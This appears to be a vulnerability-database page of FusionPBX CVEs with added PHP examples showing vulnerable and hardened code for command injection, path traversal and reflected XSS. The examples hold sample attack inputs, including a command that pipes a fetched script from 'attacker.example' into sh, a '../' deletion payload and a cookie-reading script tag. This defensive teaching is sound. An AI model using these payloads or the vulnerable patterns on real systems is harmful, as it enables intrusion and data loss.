FusionPBX

35 exploits Active since Jun 2019
CVE-2019-11408 MEDIUM WRITEUP
FusionPBX 4.4.3 - Unauthenticated Stored Cross-Site Scripting via Caller ID
XSS in app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 allows remote unauthenticated attackers to inject arbitrary JavaScript by placing a phone call with a specially crafted caller ID number; the payload runs when an operator views the panel. Chained with the command injection vulnerability also present in the Operator Panel module, this can lead to remote code execution.
CVSS 6.1
CVE-2019-11409 HIGH WRITEUP
FusionPBX 4.4.3 - Command Injection
app/operator_panel/exec.php in the Operator Panel module in FusionPBX 4.4.3 suffers from a command injection vulnerability due to a lack of input validation that allows authenticated non-administrative attackers to execute commands on the host. This can further lead to remote code execution when combined with an XSS vulnerability also present in the FusionPBX Operator Panel module.
CVSS 8.8
CVE-2021-43405 HIGH WRITEUP
FusionPBX <4.5.30 - Info Disclosure
An issue was discovered in FusionPBX before 4.5.30. The fax_extension value is not constrained to be numeric and may therefore contain risky characters.
CVSS 8.8
CVE-2022-35153 CRITICAL WRITEUP
FusionPBX 5.0.1 - OS Command Injection via Fax Send Endpoint
FusionPBX 5.0.1 was discovered to contain a command injection vulnerability via /fax/fax_send.php.
CVSS 9.8
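The Operator Panel exec.php entry (CVE-2019-11409) and the two fax entries above (CVE-2021-43405, CVE-2022-35153) share one root cause: a request value reaches a shell command line without being constrained. The PHP below is an added illustration written for this page, not FusionPBX's own code; the fax-send binary, its flags, the fax directory and the digit-only extension format are assumptions. Nothing is executed: each builder only returns the command it would run, so the effect of a crafted fax_extension on each version is visible side by side.

```php
<?php
declare(strict_types=1);

// Illustrative example (not FusionPBX code). Tool name, flags and paths are assumed.

/**
 * Vulnerable pattern: request values are concatenated into a command string
 * that is then handed to /bin/sh via exec(), shell_exec(), system(), ...
 * A value such as "1001; curl ... | sh" ends the intended command and appends another.
 */
function build_fax_command_vulnerable(string $fax_extension, string $file): string
{
    return "/usr/bin/fax-send --from {$fax_extension} --file {$file}";
}

/** Allowlist validation: an extension is a short digit string, a fax file is a plain .tif name. */
function validate_fax_params(string $fax_extension, string $file): void
{
    if (!preg_match('/^\d{1,10}$/', $fax_extension)) {
        throw new InvalidArgumentException('fax_extension must be 1-10 digits');
    }
    if (!preg_match('/^[A-Za-z0-9_-]+\.tif$/', $file)) {
        throw new InvalidArgumentException('unexpected fax file name');
    }
}

/**
 * Hardened pattern: validate first, fix the directory server-side, and escape
 * anything that must still pass through a shell.
 */
function build_fax_command_hardened(string $fax_extension, string $file): string
{
    validate_fax_params($fax_extension, $file);
    $path = '/var/lib/fusionpbx/fax/' . $file;          // assumed location
    return '/usr/bin/fax-send --from ' . escapeshellarg($fax_extension)
         . ' --file ' . escapeshellarg($path);
}

/**
 * Best option: keep the shell out entirely. proc_open() accepts an argv array
 * (PHP >= 7.4), so metacharacters in arguments are never interpreted.
 * Usage: proc_open(fax_command_argv($ext, $file), $descriptors, $pipes);
 */
function fax_command_argv(string $fax_extension, string $file): array
{
    validate_fax_params($fax_extension, $file);
    return ['/usr/bin/fax-send', '--from', $fax_extension,
            '--file', '/var/lib/fusionpbx/fax/' . $file];
}

// Constructed input of the kind an attacker would submit as fax_extension.
$crafted = '1001; curl http://attacker.example/p | sh';

echo 'vulnerable: ', build_fax_command_vulnerable($crafted, 'doc.tif'), PHP_EOL;
try {
    build_fax_command_hardened($crafted, 'doc.tif');
} catch (InvalidArgumentException $e) {
    echo 'hardened:   rejected (', $e->getMessage(), ')', PHP_EOL;
}
echo 'hardened:   ', build_fax_command_hardened('1001', 'doc.tif'), PHP_EOL;
echo 'argv:       ', json_encode(fax_command_argv('1001', 'doc.tif')), PHP_EOL;
```

The printed vulnerable line is exactly what /bin/sh would receive, with the attacker's `;` acting as a command separator. The hardened builder never gets that far because the digit-only check fails first; escaping alone would also neutralise the metacharacters, but validating the value against what an extension can legitimately be is the check that also closes the fax_extension issue in CVE-2021-43405.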
CVE-2024-24539 MEDIUM WRITEUP
FusionPBX <5.2.0 - Privilege Escalation
FusionPBX before 5.2.0 does not validate a session.
CVSS 5.3
CVE-2019-11407 HIGH WRITEUP
FusionPBX 4.4.3 - Authenticated Sensitive Information Exposure via Operator Panel Debug Information
app/operator_panel/index_inc.php in the Operator Panel module in FusionPBX 4.4.3 suffers from an information disclosure vulnerability due to excessive debug information, which allows authenticated administrative attackers to obtain credentials and other sensitive information.
CVSS 7.2
CVE-2019-16968 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via conference_control_details.php id Parameter
An issue was discovered in FusionPBX up to 4.5.7. In the file app/conference_controls/conference_control_details.php, an unsanitized id variable coming from the URL is reflected in HTML in 2 places, leading to XSS.
CVSS 6.1
CVE-2019-16970 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via sip_status.php savemsg Parameter
In FusionPBX up to 4.5.7, the file app/sip_status/sip_status.php uses an unsanitized "savemsg" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16971 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized contact_uuid Variable
In FusionPBX up to 4.5.7, the file app/messages/messages_thread.php uses an unsanitized "contact_uuid" variable coming from the URL, which is reflected in HTML in 3 places, leading to XSS.
CVSS 6.1
CVE-2019-16972 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app/contacts/contact_addresses.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16973 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to 4.5.7, the file app/contacts/contact_edit.php uses an unsanitized "query_string" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16974 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app/contacts/contact_times.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16975 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app/contacts/contact_notes.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16976 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to 4.5.7, the file app/destinations/destination_imports.php uses an unsanitized "query_string" variable coming from the URL, which is reflected in HTML in 2 places, leading to XSS.
CVSS 6.1
CVE-2019-16977 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to 4.5.7, the file app/extensions/extension_imports.php uses an unsanitized "query_string" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16979 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app/contacts/contact_urls.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16981 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized ID Parameter
In FusionPBX up to 4.5.7, the file app/conference_profiles/conference_profile_params.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML in 2 places, leading to XSS.
CVSS 6.1
CVE-2019-16983 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Paging Function
In FusionPBX up to 4.5.7, the file resources/paging.php has a paging function (called by several pages of the interface) which uses an unsanitized "param" variable, built partly from the URL arguments and reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16985 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Path Traversal and Arbitrary File Deletion via xml_cdr_delete.php
In FusionPBX up to 4.5.7, the file app/xml_cdr/xml_cdr_delete.php uses an unsanitized "rec" variable coming from the URL, which is base64 decoded and used directly as a file path, allowing deletion of any file on the system that the web server user can remove.
CVSS 6.5
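Base64 encoding is not sanitisation: "../" survives a decode round trip unchanged, which is the whole of the xml_cdr_delete.php issue above. The PHP below is an added example for this page, not FusionPBX's code; the recordings directory, the .wav/.mp3 name check and the file layout it creates are constructed for the demo. It builds a throwaway tree under the system temp directory and runs a traversal payload through the vulnerable and the hardened version of the delete routine.

```php
<?php
declare(strict_types=1);

// Illustrative example (not FusionPBX code) of the CVE-2019-16985 pattern:
// a base64-encoded value from the URL is decoded and passed straight to unlink().

/** Vulnerable: whatever the decoded string names, delete it. */
function delete_recording_vulnerable(string $rec): bool
{
    $path = base64_decode($rec);            // "../secret.txt" decodes to exactly that
    return @unlink($path);
}

/**
 * Hardened: decode strictly, treat the value as a name relative to the recordings
 * directory, resolve it, and refuse anything that resolves outside that directory.
 */
function delete_recording_hardened(string $rec, string $recordings_dir): bool
{
    $rel = base64_decode($rec, true);       // strict mode: non-base64 input returns false
    if ($rel === false || $rel === '' || strpos($rel, "\0") !== false || $rel[0] === '/') {
        return false;
    }
    $base = realpath($recordings_dir);
    $real = realpath($recordings_dir . DIRECTORY_SEPARATOR . $rel); // collapses "..", follows symlinks
    if ($base === false || $real === false) {
        return false;                       // target does not exist, nothing to do
    }
    // Compare with a trailing separator so "/srv/recordings_old" is not accepted for "/srv/recordings".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;
    }
    if (!is_file($real) || !preg_match('/\.(wav|mp3)$/i', $real)) {
        return false;
    }
    return unlink($real);
}

function report(string $label, bool $value): void
{
    echo str_pad($label, 44), $value ? 'true' : 'false', PHP_EOL;
}

// Constructed layout: a recordings directory plus a file outside it that must survive.
$root = sys_get_temp_dir() . '/rec_demo_' . bin2hex(random_bytes(4));
mkdir("$root/recordings", 0700, true);
file_put_contents("$root/recordings/call.wav", 'audio');
file_put_contents("$root/secret.txt", 'must not be deleted');

$traversal = base64_encode('../secret.txt');   // what an attacker would put in rec=
$legit     = base64_encode('call.wav');

report('hardened, traversal payload deleted:', delete_recording_hardened($traversal, "$root/recordings"));
report('secret.txt still present:',            file_exists("$root/secret.txt"));
report('hardened, legitimate name deleted:',   delete_recording_hardened($legit, "$root/recordings"));
report('call.wav still present:',              file_exists("$root/recordings/call.wav"));

// The vulnerable routine resolves the same relative path against the working directory.
chdir("$root/recordings");
report('vulnerable, traversal payload deleted:', delete_recording_vulnerable($traversal));
report('secret.txt still present:',              file_exists("$root/secret.txt"));

// Clean up the demo tree.
@unlink("$root/secret.txt");
rmdir("$root/recordings");
rmdir($root);
```

The realpath-plus-prefix check is the part that matters: it decides on the resolved path, so encoded dots, symlinks and mixed separators are all handled by the filesystem rather than by a denylist of strings. Checking that the resolved path exists before the prefix test is also why the routine returns false rather than leaking whether an arbitrary path outside the directory exists.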
CVE-2019-16987 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized Query String
In FusionPBX up to 4.5.7, the file app/contacts/contact_import.php uses an unsanitized "query_string" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-16988 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Eavesdrop Destination Parameter
In FusionPBX up to 4.5.7, the file app/basic_operator_panel/resources/content.php uses an unsanitized "eavesdrop_dest" variable coming from the URL, which is reflected in HTML in 3 places, leading to XSS.
CVSS 6.1
CVE-2019-16991 MEDIUM WRITEUP
FusionPBX < 4.5.7 - Cross-Site Scripting via Unsanitized File Parameter
In FusionPBX up to 4.5.7, the file app/edit/filedelete.php uses an unsanitized "file" variable coming from the URL, which is reflected in HTML, leading to XSS.
CVSS 6.1
CVE-2019-19367 MEDIUM WRITEUP
FusionPBX 4.4.1 - Cross-Site Scripting via id Parameter
A cross-site scripting (XSS) vulnerability in app/fax/fax_files.php in FusionPBX 4.4.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
CVSS 6.1
CVE-2019-19385 MEDIUM WRITEUP
FusionPBX 4.4.1 - Cross-Site Scripting via app_uuid Parameter
A cross-site scripting (XSS) vulnerability in app/dialplans/dialplans.php in FusionPBX 4.4.1 allows remote attackers to inject arbitrary web script or HTML via the app_uuid parameter.
CVSS 6.1
CVE-2019-19387 MEDIUM WRITEUP
FusionPBX 4.4.1 - Cross-Site Scripting via c Parameter
A cross-site scripting (XSS) vulnerability in app/fifo_list/fifo_interactive.php in FusionPBX 4.4.1 allows remote attackers to inject arbitrary web script or HTML via the c parameter.
CVSS 6.1
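Almost every entry on this page is the same bug: a value taken from the URL (id, contact_uuid, query_string, savemsg, eavesdrop_dest, the paging "param") is written into HTML without escaping, and the caller-ID entry (CVE-2019-11408) is the stored variant of it. The PHP below is an added example for this page, not FusionPBX's code; the page name, the element layout, the allowlisted query keys and the sample UUID are assumptions. It renders one attacker-controlled id and query string raw, then with the two fixes a reviewer would ask for: validate the id against the format it must have, and escape every value at the point it enters HTML.

```php
<?php
declare(strict_types=1);

// Illustrative example (not FusionPBX code) of the reflected-XSS pattern shared by
// the id / query_string / savemsg entries: a URL parameter echoed into HTML unescaped.

/** Vulnerable: the request values are interpolated raw into an attribute, a link and text. */
function render_vulnerable(string $id, string $query_string): string
{
    return '<div id="row-' . $id . '">'
         . '<a href="contact_addresses.php?id=' . $id . '&' . $query_string . '">edit</a>'
         . '<p>' . $query_string . '</p></div>';
}

/** Escape for HTML text and double-quoted attribute contexts. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Record ids in this kind of application are UUIDs; reject anything else before use. */
function is_uuid(string $s): bool
{
    return (bool) preg_match('/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i', $s);
}

/**
 * Hardened: validate the id, rebuild the query string from known keys instead of
 * echoing the raw one, and escape every value where it enters HTML.
 */
function render_hardened(string $id, array $query_params): string
{
    if (!is_uuid($id)) {
        throw new InvalidArgumentException('id must be a UUID');
    }
    $allowed = ['page', 'order_by', 'order'];          // assumed keys for the demo
    $kept = array_intersect_key($query_params, array_flip($allowed));
    $qs = http_build_query(['id' => $id] + $kept);     // percent-encodes every value
    return '<div id="row-' . h($id) . '">'
         . '<a href="contact_addresses.php?' . h($qs) . '">edit</a>'
         . '<p>Sort: ' . h($kept['order'] ?? '') . '</p></div>';
}

// Constructed attacker input: closes the attribute, then injects a script element.
$payload = '"><script>alert(document.cookie)</script>';

echo 'vulnerable: ', render_vulnerable($payload, 'order=' . $payload), PHP_EOL;
try {
    render_hardened($payload, ['order' => $payload]);
} catch (InvalidArgumentException $e) {
    echo 'hardened:   rejected (', $e->getMessage(), ')', PHP_EOL;
}
// Sample UUID constructed for the demo; an unknown key ("evil") is dropped rather than reflected.
echo 'hardened:   ', render_hardened('2f8a5c1e-3b9d-4e7a-9c2b-1d6e8f0a4b5c',
                                     ['order' => $payload, 'evil' => 'x']), PHP_EOL;
```

Two points carry over to the stored case. Escaping belongs at output, so a caller ID arriving from the switch is treated exactly like a URL parameter when it is written into the operator panel. And the escaping must match the context: htmlspecialchars with ENT_QUOTES covers text and quoted attributes, while a value placed in a URL is percent-encoded first (http_build_query here) and then HTML-escaped for the attribute it sits in; a value placed inside a script block needs JSON encoding instead, which none of these helpers provide.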